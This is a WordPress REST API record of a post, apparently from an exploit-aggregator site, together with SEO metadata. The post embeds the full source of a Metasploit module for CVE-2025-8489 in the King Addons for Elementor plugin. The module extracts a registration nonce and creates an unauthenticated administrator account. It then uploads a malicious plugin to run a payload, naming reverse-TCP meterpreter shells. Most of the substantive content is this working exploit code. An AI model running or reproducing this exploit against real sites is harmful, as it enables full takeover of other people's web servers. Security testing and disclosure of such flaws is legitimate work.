{"id":30209,"date":"2025-12-10T13:53:25","date_gmt":"2025-12-10T13:53:25","guid":{"rendered":"http:\/\/localhost\/?p=30209"},"modified":"2025-12-10T13:53:25","modified_gmt":"2025-12-10T13:53:25","slug":"wordpress-king-addons-for-elementor-unauthenticated-privilege-escalation-to-rce","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=30209","title":{"rendered":"WordPress King Addons for Elementor Unauthenticated Privilege Escalation to RCE_MSF:EXPLOIT-MULTI-HTTP-WP_KING_ADDONS_PRIVILEGE_ESCALATION-"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-10T19:05:03&#8243;,&#8221;description&#8221;:&#8221;This module exploits an unauthenticated privilege escalation vulnerability in the WordPress King Addons for Elementor plugin versions 24.12.92 to 51.1.14. The vulnerability exists in the handleregisterajax function which allows unauthenticated&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-10T18:57:29&#8243;,&#8221;modified&#8221;:&#8221;2025-12-10T18:57:29&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;WordPress King Addons for Elementor Unauthenticated Privilege Escalation to RCE&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSF:EXPLOIT-MULTI-HTTP-WP_KING_ADDONS_PRIVILEGE_ESCALATION-&#8220;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-8489&#8243;],&#8221;sourceData&#8221;:&#8221;##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Remote\\n  Rank = ExcellentRanking\\n\\n  include Msf::Payload::Php\\n  include Msf::Exploit::FileDropper\\n  include Msf::Exploit::Remote::HttpClient\\n  include Msf::Exploit::Remote::HTTP::Wordpress\\n\\n  prepend Msf::Exploit::Remote::AutoCheck\\n\\n  def initialize(info = {})\\n    super(\\n      update_info(\\n        info,\\n        &#8216;Name&#8217; =\\u003e &#8216;WordPress King Addons for Elementor Unauthenticated Privilege Escalation to RCE&#8217;,\\n        &#8216;Description&#8217; =\\u003e %q{\\n          This module exploits an unauthenticated privilege escalation vulnerability in the WordPress\\n          King Addons for Elementor plugin (versions 24.12.92 to 51.1.14). The vulnerability exists\\n          in the handle_register_ajax() function which allows unauthenticated attackers to specify\\n          the user_role parameter during registration, enabling them to create administrator accounts.\\n\\n          This exploit requires a WordPress page containing the King Addons \\&#8221;Login Register Form\\&#8221;\\n          Elementor widget, which exposes the required nonce token in the page&#8217;s JavaScript.\\n          The NONCE_PAGE option must be set to the path of such a page.\\n\\n          Once an administrator account is created, the module uploads and executes a malicious\\n          plugin to achieve remote code execution (RCE).\\n        },\\n        &#8216;Author&#8217; =\\u003e [\\n          &#8216;Peter Thaleikis&#8217;,                             # Vulnerability discovery\\n          &#8216;Valentin Lobstein \\u003cchocapikk@leakix.net\\u003e&#8217;     # Metasploit module\\n        ],\\n        &#8216;License&#8217; =\\u003e MSF_LICENSE,\\n        &#8216;References&#8217; =\\u003e [\\n          [&#8216;CVE&#8217;, &#8216;2025-8489&#8217;],\\n          [&#8216;URL&#8217;, &#8216;https:\/\/www.wordfence.com\/blog\/2025\/12\/attackers-actively-exploiting-critical-vulnerability-in-king-addons-for-elementor-plugin\/&#8217;]\\n        ],\\n        &#8216;Platform&#8217; =\\u003e %w[php unix linux win],\\n        &#8216;Arch&#8217; =\\u003e [ARCH_PHP, ARCH_CMD],\\n        &#8216;DisclosureDate&#8217; =\\u003e &#8216;2025-10-30&#8217;,\\n        &#8216;DefaultTarget&#8217; =\\u003e 0,\\n        &#8216;Privileged&#8217; =\\u003e false,\\n        &#8216;Targets&#8217; =\\u003e [\\n          [\\n            &#8216;PHP In-Memory&#8217;,\\n            {\\n              &#8216;Platform&#8217; =\\u003e &#8216;php&#8217;,\\n              &#8216;Arch&#8217; =\\u003e ARCH_PHP\\n              # tested with php\/meterpreter\/reverse_tcp\\n            }\\n          ],\\n          [\\n            &#8216;Unix\/Linux Command Shell&#8217;,\\n            {\\n              &#8216;Platform&#8217; =\\u003e %w[unix linux],\\n              &#8216;Arch&#8217; =\\u003e ARCH_CMD\\n              # tested with cmd\/linux\/http\/x64\/meterpreter\/reverse_tcp\\n            }\\n          ],\\n          [\\n            &#8216;Windows Command Shell&#8217;,\\n            {\\n              &#8216;Platform&#8217; =\\u003e &#8216;win&#8217;,\\n              &#8216;Arch&#8217; =\\u003e ARCH_CMD\\n              # tested with cmd\/windows\/http\/x64\/meterpreter\/reverse_tcp\\n            }\\n          ]\\n        ],\\n        &#8216;Notes&#8217; =\\u003e {\\n          &#8216;Stability&#8217; =\\u003e [CRASH_SAFE],\\n          &#8216;Reliability&#8217; =\\u003e [REPEATABLE_SESSION],\\n          &#8216;SideEffects&#8217; =\\u003e [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\\n        }\\n      )\\n    )\\n\\n    register_options(\\n      [\\n        OptString.new(&#8216;NONCE_PAGE&#8217;, [true, &#8216;Path to page containing King Addons Login Register Form widget&#8217;, &#8221;]),\\n        OptString.new(&#8216;USERNAME&#8217;, [true, &#8216;Username to create&#8217;, Faker::Internet.username]),\\n        OptString.new(&#8216;PASSWORD&#8217;, [true, &#8216;Password for the new user&#8217;, Faker::Internet.password(min_length: 8)]),\\n        OptString.new(&#8216;EMAIL&#8217;, [true, &#8216;Email for the new user&#8217;, Faker::Internet.email])\\n      ]\\n    )\\n  end\\n\\n  def check\\n    return CheckCode::Unknown unless wordpress_and_online?\\n\\n    plugin_check = check_plugin_version_from_readme(&#8216;king-addons&#8217;, &#8216;51.1.35&#8217;, &#8216;24.12.92&#8217;)\\n    return plugin_check if plugin_check == CheckCode::Safe\\n\\n    @nonce = find_nonce\\n    return CheckCode::Detected(&#8216;Could not find nonce on specified page&#8217;) unless @nonce\\n\\n    CheckCode::Appears\\n  end\\n\\n  def exploit\\n    fail_with(Failure::NotFound, &#8216;The target does not appear to be using WordPress&#8217;) unless wordpress_and_online?\\n\\n    user_existed = create_admin_user(datastore[&#8216;USERNAME&#8217;], datastore[&#8216;PASSWORD&#8217;], datastore[&#8216;EMAIL&#8217;])\\n\\n    admin_cookie = wordpress_login(datastore[&#8216;USERNAME&#8217;], datastore[&#8216;PASSWORD&#8217;])\\n    unless admin_cookie\\n      msg = &#8216;Failed to log in to WordPress admin.&#8217;\\n      msg += &#8216; User may exist with a different password.&#8217; if user_existed\\n      fail_with(Failure::UnexpectedReply, msg)\\n    end\\n\\n    upload_and_execute_payload(admin_cookie)\\n  end\\n\\n  private\\n\\n  def find_nonce\\n    nonce_page = normalize_uri(target_uri.path, datastore[&#8216;NONCE_PAGE&#8217;])\\n    res = send_request_cgi(&#8216;method&#8217; =\\u003e &#8216;GET&#8217;, &#8216;uri&#8217; =\\u003e nonce_page)\\n    return nil unless res\\u0026.code == 200\\n\\n    doc = res.get_html_document\\n    return nil unless doc\\n\\n    script_nodes = doc.xpath(&#8216;\/\/script[contains(text(), \\&#8221;king_addons_login_register_vars\\&#8221;)]&#8217;)\\n\\n    script_nodes.each do |script_node|\\n      nonce = extract_nonce_from_script(script_node.text)\\n      return nonce if nonce\\n    end\\n\\n    vprint_warning(&#8216;Could not find nonce&#8217;)\\n    nil\\n  end\\n\\n  def extract_nonce_from_script(script_content)\\n    match = script_content.match(\/king_addons_login_register_vars\\\\s*=\\\\s*({[^;]+})\/)\\n    return nil unless match\\n\\n    json_data = begin\\n      JSON.parse(match[1].gsub(&#8216;\\\\\/&#8217;, &#8216;\/&#8217;))\\n    rescue StandardError\\n      nil\\n    end\\n    return nil unless json_data.is_a?(Hash)\\n\\n    nonce = json_data[&#8216;register_nonce&#8217;]\\n    return nil unless nonce.is_a?(String) \\u0026\\u0026 !nonce.empty?\\n\\n    vprint_status(\\&#8221;Found nonce: #{nonce}\\&#8221;)\\n    nonce\\n  end\\n\\n  def send_registration_request(username:, email:, password:, user_role: &#8216;administrator&#8217;)\\n    @nonce ||= find_nonce\\n    fail_with(Failure::NotFound, &#8216;Could not find nonce on specified page&#8217;) unless @nonce\\n\\n    send_request_cgi(\\n      &#8216;method&#8217; =\\u003e &#8216;POST&#8217;,\\n      &#8216;uri&#8217; =\\u003e wordpress_url_admin_ajax,\\n      &#8216;vars_post&#8217; =\\u003e {\\n        &#8216;action&#8217; =\\u003e &#8216;king_addons_user_register&#8217;,\\n        &#8216;nonce&#8217; =\\u003e @nonce,\\n        &#8216;username&#8217; =\\u003e username,\\n        &#8217;email&#8217; =\\u003e email,\\n        &#8216;password&#8217; =\\u003e password,\\n        &#8216;confirm_password&#8217; =\\u003e password,\\n        &#8216;user_role&#8217; =\\u003e user_role,\\n        &#8216;terms_required&#8217; =\\u003e &#8216;no&#8217;\\n      }\\n    )\\n  end\\n\\n  def create_admin_user(username, password, email)\\n    res = send_registration_request(username: username, email: email, password: password)\\n    unless res\\u0026.code == 200\\n      fail_with(Failure::UnexpectedReply, &#8216;Failed to create administrator account.&#8217;)\\n    end\\n\\n    json = res.get_json_document\\n    unless json.is_a?(Hash)\\n      fail_with(Failure::UnexpectedReply, &#8216;Failed to create administrator account.&#8217;)\\n    end\\n\\n    if json[&#8216;success&#8217;] == false \\u0026\\u0026 json.dig(&#8216;data&#8217;, &#8216;message&#8217;)\\u0026.match?(\/already exists|username.*taken|user.*exists\/i)\\n      print_warning(&#8216;User or email already exists, attempting login with provided credentials&#8230;&#8217;)\\n      return true\\n    end\\n\\n    if json[&#8216;success&#8217;] == true\\n      return false\\n    end\\n\\n    fail_with(Failure::UnexpectedReply, \\&#8221;Unexpected response: #{res.body}\\&#8221;)\\n  end\\n\\n  def upload_and_execute_payload(admin_cookie)\\n    plugin_name = \\&#8221;wp_#{Rex::Text.rand_text_alphanumeric(5).downcase}\\&#8221;\\n    payload_name = \\&#8221;ajax_#{Rex::Text.rand_text_alphanumeric(5).downcase}\\&#8221;\\n\\n    zip = generate_plugin(plugin_name, payload_name)\\n    fail_with(Failure::UnexpectedReply, &#8216;Failed to upload the payload&#8217;) unless wordpress_upload_plugin(plugin_name, zip.pack, admin_cookie)\\n\\n    register_files_for_cleanup(\\&#8221;#{payload_name}.php\\&#8221;, \\&#8221;#{plugin_name}.php\\&#8221;)\\n    register_dir_for_cleanup(\\&#8221;..\/#{plugin_name}\\&#8221;)\\n    payload_file = \\&#8221;#{payload_name}.php\\&#8221;\\n    payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, payload_file)\\n    send_request_cgi(&#8216;uri&#8217; =\\u003e payload_uri, &#8216;method&#8217; =\\u003e &#8216;GET&#8217;)\\n  end\\nend\\n&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/multi\/http\/wp_king_addons_privilege_escalation.rb&#8221;,&#8221;cvss&#8221;:{&#8220;score&#8221;:9.8,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/www.rapid7.com\/db\/modules\/exploit\/multi\/http\/wp_king_addons_privilege_escalation\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-10T19:05:03&#8243;,&#8221;description&#8221;:&#8221;This module exploits an unauthenticated privilege escalation vulnerability in the WordPress King Addons for Elementor plugin versions 24.12.92 to 51.1.14. The vulnerability exists in the&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,169,13,7,11,5],"class_list":["post-30209","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>WordPress King Addons for Elementor Unauthenticated Privilege Escalation to RCE_MSF:EXPLOIT-MULTI-HTTP-WP_KING_ADDONS_PRIVILEGE_ESCALATION- zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=30209\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"WordPress King Addons for Elementor Unauthenticated Privilege Escalation to RCE_MSF:EXPLOIT-MULTI-HTTP-WP_KING_ADDONS_PRIVILEGE_ESCALATION- zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-12-10T19:05:03&#8243;,&#8221;description&#8221;:&#8221;This module exploits an unauthenticated privilege escalation vulnerability in the WordPress King Addons for Elementor plugin versions 24.12.92 to 51.1.14. The vulnerability exists in the...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=30209\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-10T13:53:25+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"7 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=30209#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=30209\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"WordPress King Addons for Elementor Unauthenticated Privilege Escalation to RCE_MSF:EXPLOIT-MULTI-HTTP-WP_KING_ADDONS_PRIVILEGE_ESCALATION-\",\"datePublished\":\"2025-12-10T13:53:25+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=30209\"},\"wordCount\":1324,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"metasploit\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=30209#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=30209\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=30209\",\"name\":\"WordPress King Addons for Elementor Unauthenticated Privilege Escalation to RCE_MSF:EXPLOIT-MULTI-HTTP-WP_KING_ADDONS_PRIVILEGE_ESCALATION- zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-10T13:53:25+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=30209#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=30209\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=30209#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"WordPress King Addons for Elementor Unauthenticated Privilege Escalation to RCE_MSF:EXPLOIT-MULTI-HTTP-WP_KING_ADDONS_PRIVILEGE_ESCALATION-\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"WordPress King Addons for Elementor Unauthenticated Privilege Escalation to RCE_MSF:EXPLOIT-MULTI-HTTP-WP_KING_ADDONS_PRIVILEGE_ESCALATION- zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=30209","og_locale":"en_US","og_type":"article","og_title":"WordPress King Addons for Elementor Unauthenticated Privilege Escalation to RCE_MSF:EXPLOIT-MULTI-HTTP-WP_KING_ADDONS_PRIVILEGE_ESCALATION- zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2025-12-10T19:05:03&#8243;,&#8221;description&#8221;:&#8221;This module exploits an unauthenticated privilege escalation vulnerability in the WordPress King Addons for Elementor plugin versions 24.12.92 to 51.1.14. The vulnerability exists in the...","og_url":"https:\/\/zero.redgem.net\/?p=30209","og_site_name":"zero redgem","article_published_time":"2025-12-10T13:53:25+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"7 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=30209#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=30209"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"WordPress King Addons for Elementor Unauthenticated Privilege Escalation to RCE_MSF:EXPLOIT-MULTI-HTTP-WP_KING_ADDONS_PRIVILEGE_ESCALATION-","datePublished":"2025-12-10T13:53:25+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=30209"},"wordCount":1324,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","metasploit","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=30209#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=30209","url":"https:\/\/zero.redgem.net\/?p=30209","name":"WordPress King Addons for Elementor Unauthenticated Privilege Escalation to RCE_MSF:EXPLOIT-MULTI-HTTP-WP_KING_ADDONS_PRIVILEGE_ESCALATION- zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-10T13:53:25+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=30209#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=30209"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=30209#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"WordPress King Addons for Elementor Unauthenticated Privilege Escalation to RCE_MSF:EXPLOIT-MULTI-HTTP-WP_KING_ADDONS_PRIVILEGE_ESCALATION-"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/30209","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=30209"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/30209\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=30209"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=30209"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=30209"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}